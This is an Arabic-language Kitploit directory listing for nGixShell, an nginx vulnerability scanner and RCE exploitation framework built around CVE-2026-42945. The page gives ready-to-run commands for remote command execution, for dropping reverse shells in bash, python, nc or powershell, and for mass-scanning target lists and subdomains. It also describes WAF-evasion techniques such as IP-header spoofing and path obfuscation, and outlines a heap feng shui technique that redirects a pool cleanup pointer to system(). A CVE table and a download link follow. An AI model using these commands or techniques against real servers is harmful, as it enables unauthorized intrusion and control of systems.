Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
nGixshell — nginx ماسح CVE + إطار عمل استغلال RCE (CVE-2026-42945 + 16 أخرى) | Kitploit
أدوات/GitHubGitHub/mateusverass/ngixshell
الاستطلاعماسحات الثغرات الأمنيةأطر الاستغلالاستغلال تطبيقات الويبتجاوز WAFأمن الويباختبار الاختراقالقيادة والسيطرةتعداد النطاقات الفرعيةالفريق الأحمرتطوير الحمولات
218منذ 3 أشهرتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHub
mateusverass/ngixshell

nGixshell

nginx ماسح CVE + إطار عمل استغلال RCE (CVE-2026-42945 + 16 أخرى)

عرض المستودع
nGixShell

Python CVEs Zero deps License


nGixShell هو ماسح ضوئي لثغرات nginx وإطار عمل لاستغلال RCE. يأتي مع إثبات مفهوم عملي لـ CVE-2026-42945 — وهو تجاوز سعة حرج للمخزن المؤقت في الكومة (heap buffer overflow) في ngx_http_rewrite_module — وماسح يغطي 53 ثغرة من ثغرات nginx مع فحوصات HTTP آلية، وبصمة الخادم، واكتشاف/تجاوز WAF، وتدقيق أمان الويب، وتوليد التقارير.

صفر تبعيات خارجية. مكتبة Python 3 القياسية فقط.


بدء سريع

root@kitploit:~
# Spin up the vulnerable lab
docker compose -f env/docker-compose.yml up -d

# Auto mode — fingerprint + CVE scan + web audit
python3 ngixshell.py 127.0.0.1:19321

# Execute a command via RCE (CVE-2026-42945)
python3 ngixshell.py 127.0.0.1:19321 --cmd 'id'

# Drop a reverse shell (IP auto-detected)
python3 ngixshell.py 127.0.0.1:19321 --shell --shell-type bash --upgrade-shell

# Detect and bypass WAF, then scan
python3 ngixshell.py 127.0.0.1:19321 --waf-bypass

# Subdomain scan
python3 ngixshell.py --subdomain-scan example.com --scan-port 443

# Multiple targets from a file
python3 ngixshell.py --target-file hosts.txt --json --html-report results.html

لا حاجة لأي خيارات — توجيه الأداة إلى هدف يُشغّل كل شيء تلقائيًا.
TLS يُكتشف تلقائيًا. يتم التعرف على بصمة nginx حتى مع تفعيل server_tokens off.


الاستخدام

root@kitploit:~
python3 ngixshell.py [TARGET] [OPTIONS]

TARGET formats:
  127.0.0.1
  192.168.1.10:8080
  http://192.168.1.10:8080
  https://target.local

الأوضاع

اكتشاف WAF وتجاوزه

الخيارالوصف
--waf-detectاكتشاف WAF قبل الفحص
--waf-bypassتفعيل جميع تقنيات التجاوز (يشغّل الاكتشاف أيضًا)
--waf-ip IPانتحال عنوان IP هذا في ترويسات التجاوز (الافتراضي: RFC1918 عشوائي)

تقنيات التجاوز (جميعها نشطة عند ضبط --waf-bypass):

واجهات WAF المكتشفة: Cloudflare, AWS WAF, Akamai, Imperva/Incapsula, ModSecurity, F5 BIG-IP ASM, Sucuri, Barracuda, NAXSI, Fastly, Wordfence

تدقيق الويب

يعمل تلقائيًا في وضع الفحص. يمكن تخطي جميع الوحدات بشكل فردي.

  • تدقيق الترويسات — HSTS وCSP وX-Frame-Options وX-Content-Type-Options وReferrer-Policy وPermissions-Policy وترويسات كشف الإصدار
  • اكتشاف المسارات — أكثر من 50 مسارًا؛ يزيل فحص الحارس (sentinel) النتائج الإيجابية الخاطئة الناتجة عن قواعد الالتقاط الشامل 403/301
  • تعداد المضيفات الافتراضية — يتطلب اختلاف حالة الاستجابة AND ومحتوى الجسم لتجنب النتائج الإيجابية الخاطئة للكتلة الافتراضية
  • تدقيق TLS — يختبر دعم TLS 1.0–1.3، وانتهاء صلاحية الشهادات، وكشف الشهادات ذاتية التوقيع
  • stub_status — يحلل مقاييس الاتصالات النشطة من /nginx_status إذا كان مكشوفًا

الاتصال

الخيارالوصف
--port PORTتجاوز المنفذ
--tlsفرض TLS (يُكتشف تلقائيًا افتراضيًا)

HTTP

الخيارالوصف
--user-agent UAوكيل مستخدم مخصص
--auth USER:PASSمصادقة HTTP الأساسية
--cookie VALUE

المعدل / التوقيت

الخيارالوصف
--rate-limit RPSالحد الأقصى للطلبات في الثانية
--jitter MS

المخرجات

الخيارالوصف
--output FILE

تغطية الثغرات CVE

53 إدخالًا تمتد من 2009 حتى 2026. مرتبة حسب CVSS.


الثغرة (CVE-2026-42945)

يستخدم محرك سكربت إعادة الكتابة في nginx نموذج ثنائي المرور: حساب حجم المخزن المؤقت، ثم النسخ. يتم ضبط العلم is_args على المحرك الرئيسي عندما يحتوي بديل rewrite على ?، لكن مرور حساب الطول يعمل على محرك فرعي تم تصفيره حديثًا:

  • مرور الطول — يرى is_args = 0 ← يعيد طول الالتقاط الخام
  • مرور النسخ — يرى is_args = 1 ← يستدعي ngx_escape_uri(NGX_ESCAPE_ARGS)، موسّعًا كل بايت غير آمن إلى 3 بايتات

يؤدي النسخ إلى تجاوز سعة المخزن المؤقت للكومة صغير الحجم ببيانات URI يتحكم بها المهاجم. يُفسد الاستغلال مؤشر تنظيف ngx_pool_t مجاورًا عبر هندسة كومة عبر الطلبات (cross-request heap feng shui)، معيدًا توجيهه إلى ngx_pool_cleanup_s مزيف يستدعي system() عند تدمير التجمع.

الإصدارات المتأثرة

المنتجالمتأثرةالمُصحَّحة
NGINX Open Source0.6.27 – 1.30.01.31.0, 1.30.1
NGINX PlusR32 – R36R36 P4, R35 P2, R32 P6

نشرة البائع الأمنية: https://my.f5.com/manage/s/article/K000160932


إعداد المختبر

تم اختباره على Ubuntu 24.04 LTS. يتطلب Docker وPython 3.8+.

root@kitploit:~
# Start the vulnerable lab (nginx 1.25.3)
docker compose -f env/docker-compose.yml up -d

# Full scan
python3 ngixshell.py 127.0.0.1:19321

# RCE with JSON output
python3 ngixshell.py 127.0.0.1:19321 --cmd 'id' --json

# Reverse shell — bash payload, PTY auto-upgrade
python3 ngixshell.py 127.0.0.1:19321 --shell --shell-type bash --upgrade-shell

# WAF bypass scan with spoofed IP
python3 ngixshell.py 127.0.0.1:19321 --waf-bypass --waf-ip 10.10.10.1

# Through SOCKS5 proxy
python3 ngixshell.py 192.168.1.10 --proxy socks5://127.0.0.1:9050

# Subdomain scan with rate limiting
python3 ngixshell.py --subdomain-scan example.com --scan-port 443 --rate-limit 10

# Multiple targets, JSON output, HTML report
python3 ngixshell.py --target-file hosts.txt --json --html-report results.html

إخلاء مسؤولية

للاستخدام في اختبارات الأمان المصرح بها، ومسابقات CTF، والأغراض البحثية فقط.

تنزيل الأداة
الخيارالوصف
(بدون)تلقائي — بصمة الخادم + فحص CVE + تدقيق الويب
--cmd 'CMD'تنفيذ أمر عبر RCE الخاص بـ CVE-2026-42945
--cmd-file FILEتنفيذ أوامر من ملف (مفصولة بـ ;)
--shellفتح قشرة عكسية (reverse shell)
--shell-type TYPEالحمولة: bash python perl php nc powershell (الافتراضي: python)
--upgrade-shellإرسال ترقية PTY تلقائيًا بعد اتصال القشرة
--subdomain-scan DOMAINالبحث عن nginx قابل للاستغلال في النطاقات الفرعية
--cve CVE-IDاختبار ثغرة CVE محددة واحدة
--list-cvesطباعة جميع الثغرات الـ 53 مع CVSS ومعلومات الفحص
--list-candidatesطباعة العناوين المرشحة للكومة (heap)
--dry-runبصمة الخادم + فحص فقط، دون استغلال
--target-file FILEفحص عدة مضيفين من ملف
التقنيةالتفاصيل
انتحال IPX-Forwarded-For, X-Real-IP, X-Originating-IP, True-Client-IP, X-Remote-IP, X-Client-IP
تدوير UA11 وكيل مستخدم حقيقي للمتصفحات/الروبوتات، تُختار عشوائيًا لكل طلب
إخفاء المسارشرطة مزدوجة، حشو /./، ترميز النسبة المئوية، تنويع حالة الأحرف
خلط حالة الترويسةعشوائية حالة أسماء الترويسات لكسر مطابقة أنماط WAF
الخيارالوصف
--skip-headersتخطي تدقيق ترويسات أمان HTTP
--skip-pathsتخطي اكتشاف المسارات/الملفات
--skip-vhostsتخطي تعداد المضيفات الافتراضية
--skip-tlsتخطي تدقيق بروتوكول TLS
--path-wordlist FILEمسارات إضافية لفحصها (مسار واحد في كل سطر)
--proxy URLالوكيل: http://, https://, socks5://
ترويسة الكوكيز
--header NAME:VALUEترويسة إضافية (قابلة للتكرار)
تأخير عشوائي بين 0–MS ميلي ثانية بين الطلبات
--retry Nإعادة محاولة الفحوصات غير الحاسمة (الافتراضي: 1)
--timeout-multiplier Xقياس جميع المهلات (الافتراضي: 1.0)
كتابة السجل إلى FILE
--jsonطباعة ملخص JSON في النهاية
--html-report [FILE]إنشاء تقرير HTML (الافتراضي: ngixshell_<host>_<ts>.html)
--verboseمخرجات التصحيح
CVECVSSالمكوّنالوصف
CVE-2026-429459.8 CRITICALrewriteتجاوز سعة للكومة ← RCE (مُستغل)
CVE-2026-429468.1 HIGHrewriteتلف في الذاكرة (نفس النشرة الأمنية)
CVE-2022-417417.8 HIGHmp4تلف في الذاكرة عبر mp4 خبيث
CVE-2016-12477.8 HIGHpackagingتصعيد امتيازات عبر رابط رمزي لملف السجل
CVE-2021-230177.7 HIGHresolverكتابة خارج الحدود بمقدار واحد في الكومة (off-by-one)
CVE-2026-407017.5 HIGHrequestتلف في الذاكرة أثناء معالجة الطلبات
CVE-2026-429347.5 HIGHrequestتلف في الذاكرة (نفس النشرة الأمنية)
CVE-2026-277847.5 HIGHmp4تجاوز سعة للمخزن المؤقت عبر mp4 مصمم بعناية
CVE-2026-326477.5 HIGHmp4تجاوز سعة للمخزن المؤقت (شقيق ما سبق)
CVE-2024-249907.5 HIGHHTTP/3استخدام بعد التحرير (Use-after-free) في وحدة QUIC
CVE-2024-249897.5 HIGHHTTP/3إلغاء مرجعية مؤشر NULL في QUIC
CVE-2024-310797.5 HIGHHTTP/3تجاوز سعة للمكدس في مُرمّز QUIC
CVE-2024-327607.5 HIGHHTTP/3كتابة فوق المخزن المؤقت عبر إطار HEADERS
CVE-2022-417427.5 HIGHmp4كشف محتويات ذاكرة الكومة
CVE-2017-75297.5 HIGHrange filterتجاوز سعة للأعداد الصحيحة ← قراءة خارج الحدود
CVE-2016-07467.5 HIGHresolverاستخدام بعد التحرير عبر استجابة DNS مصممة بعناية
CVE-2014-01337.5 HIGHSPDYتجاوز سعة للكومة في تطبيق SPDY
CVE-2014-00887.5 HIGHSPDYتلف في الذاكرة في SPDY
CVE-2013-45477.5 HIGHcoreتجاوز URI بمسافة وNUL
CVE-2013-20287.5 HIGHcoreتجاوز سعة للمكدس في الترميز المجزأ
CVE-2012-11807.5 HIGHproxyاستخدام بعد التحرير في وحدة البروكسي
CVE-2009-35557.5 HIGHSSLحقن إعادة التفاوض TLS (هجوم الرجل في المنتصف MITM)
CVE-2009-26297.5 HIGHcoreنقص تدفق في المخزن المؤقت أثناء تحليل URI
CVE-2026-429266.5 MEDIUMHTTP/2تقسيم الطلبات عبر البروكسي
CVE-2026-276546.5 MEDIUMWebDAVتجاوز سعة للكومة في وحدة DAV
CVE-2026-287536.5 MEDIUMmailحقن ترويسات في بروكسي البريد
CVE-2026-16426.5 MEDIUMproxyتسريب إعادة استخدام جلسة SSL للمصاعد (upstream)
CVE-2019-95116.5 MEDIUMHTTP/2هجوم DoS على وحدة المعالجة والذاكرة عبر Data Dribble
CVE-2012-20896.8 MEDIUMmp4تجاوز سعة للمخزن المؤقت عبر طلب mp4
CVE-2018-168455.5 MEDIUMmp4نقص تدفق للأعداد الصحيحة ← تعطل + كشف بيانات
CVE-2019-203725.3 MEDIUMproxyتهريب طلبات HTTP
CVE-2026-404605.3 MEDIUMHTTP/3انتحال اتصال QUIC
CVE-2026-287555.3 MEDIUMSSLكشف ذاكرة أثناء معالجة OCSP
CVE-2025-234195.3 MEDIUMSSLتجاوز الشهادة في استئناف جلسة TLS
CVE-2024-352005.3 MEDIUMHTTP/3إلغاء مرجعية مؤشر NULL
CVE-2024-341615.3 MEDIUMHTTP/3كشف ذاكرة
CVE-2016-44505.3 MEDIUMcoreمؤشر NULL عبر جسم طلب مجزأ
CVE-2016-07425.0 MEDIUMresolverمؤشر غير صالح عبر حزمة UDP مصممة بعناية
CVE-2016-07475.0 MEDIUMresolverحد غير كافٍ لحل CNAME
CVE-2014-35565.0 MEDIUMmailحقن أوامر STARTTLS
CVE-2013-20705.3 MEDIUMproxyكشف استجابة الخادم الخلفي
CVE-2011-49635.0 MEDIUMaccessتجاوز التحكم في الوصول عبر عنوان IPv6 النصي
CVE-2011-43155.0 MEDIUMresolverتجاوز سعة للكومة عبر استجابة DNS مصممة بعناية
CVE-2009-38965.0 MEDIUMcoreهجوم DoS عبر إلغاء مرجعية مؤشر NULL
CVE-2025-538594.3 MEDIUMmailحقن أوامر SMTP
CVE-2014-36164.3 MEDIUMSSLالالتباس في المضيف الافتراضي عبر TLS SNI
CVE-2026-276514.3 MEDIUMmailإلغاء مرجعية مؤشر NULL في بروكسي البريد
CVE-2019-95134.3 MEDIUMHTTP/2هجوم DoS على وحدة المعالجة عبر Resource Loop
CVE-2019-95164.3 MEDIUMHTTP/2استنزاف الذاكرة عبر ترويسات بطول صفر
CVE-2018-168434.3 MEDIUMHTTP/2استهلاك مفرط للذاكرة
CVE-2018-168444.3 MEDIUMHTTP/2استهلاك مفرط لوحدة المعالجة عبر إطارات SETTINGS
CVE-2024-73474.7 MEDIUMmp4قراءة خارج الحدود
CVE-2009-38984.9 MEDIUMWebDAVاجتياز الدلائل عبر COPY/MOVE